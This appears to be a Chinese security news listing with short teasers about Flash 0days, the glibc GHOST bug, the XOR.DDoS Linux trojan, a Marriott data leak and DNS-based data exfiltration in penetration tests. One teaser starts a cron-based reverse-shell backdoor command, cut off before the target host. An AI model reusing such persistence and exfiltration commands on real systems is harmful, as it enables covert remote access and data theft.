Adobe已修复两个在Adobe Flash里面的0day漏洞。修复第一个0day漏洞上周,公司宣布对Flash Player中的一个重要漏洞提供紧急更新。然而,这并非安全研究员Kafeine所报告的...
漏洞分享
漏洞分享
网络安全
万豪酒店Web服务漏洞泄露客户预订及支付信息
最近万豪酒店因拦截酒店会议中心的客户WiFi通讯而频见报端。作为万豪酒店的一名顾客,我想知道他们是怎么“拦截”访问我在他们系统中的敏感信息的。由于web服务的安全性常被忽略,从他们的万豪国际安卓app...
网络安全
Flash爆出高危0day漏洞,影响绝大多数windows版本
目前作者只给出了简单的描述,具体的技术细节我们会继续跟进。法国的安全研究者Kafeine发现在最新的Angler EK(一个挂马工具包)中集成了三个flash的漏洞用于挂马,其中两个是已经修复的漏洞,...
漏洞分享
Linux Glibc幽灵漏洞允许黑客远程获取系统权限
幽灵漏洞是Linux glibc库上出现的一个严重的安全问题,他可以让攻击者在不了解系统的任何情况下远程获取操作系统的控制权限。目前他的CVE编号为CVE-2015-0235。什么是glibcglib...
一条命令实现无文件兼容性强的反弹后门
最好用一个不常见的用户执行,任务写入/var/spool/cron/$username (crontab -l;echo '*/60 * * * * exec 9<> /...
漏洞分享
CVE-2015-0393:Oracle发布严重安全漏洞预警
疑似后门:漏洞CVE-2015-0393江湖人称“Oracle漏洞猎手”的David Litchfield在去年6月11日发现过Oracle一个疑似后门的严重漏洞CVE-2015-0393。日前Lit...
可感染Linux平台的最新木马XOR.DDoS
一种名为“XOR.DDoS”的新型木马出现,该木马能够感染32位和64位的Linux系统,通过安装rootkit来隐藏自身,并可通过DDoS攻击形成僵尸网络。XOR.DDoS木马原理杀毒软件公司Ava...
网络安全
如何在渗透测试中利用BASH和DNS下载数据
在渗透测试过程中,拿到服务器权限之后从服务器下载数据是一件比较费劲的事情,因为服务器一般都有防火墙在前面挡着。防火墙一般都会禁止服务器对外建立连接,这种情况下使用DNS来下载数据是一种行之有效的方法,...
网络安全
对抗机器人:打造前后端结合的WAF(应用层防火墙)
前言 之前介绍了一些前后端结合的中间人攻击方案。由于Web程序的特殊性,前端脚本的参与能大幅弥补后端的不足,从而达到传统难以实现的效果。 攻防本为一体,既然能用于攻击,类似的思路同样也可用于防...
网络安全
偷梁换柱:对一个可疑Payload的研究
我们团队一直致力于研究网络安全领域一些偏门的东西。对我们来说,每天挖掘新鲜的东西、了解攻击者的思路,以及发现最新的技术趋势是一件非常有意思的事。这也给了我们与大家分享的机会。 字母之差 当我们发现可疑...
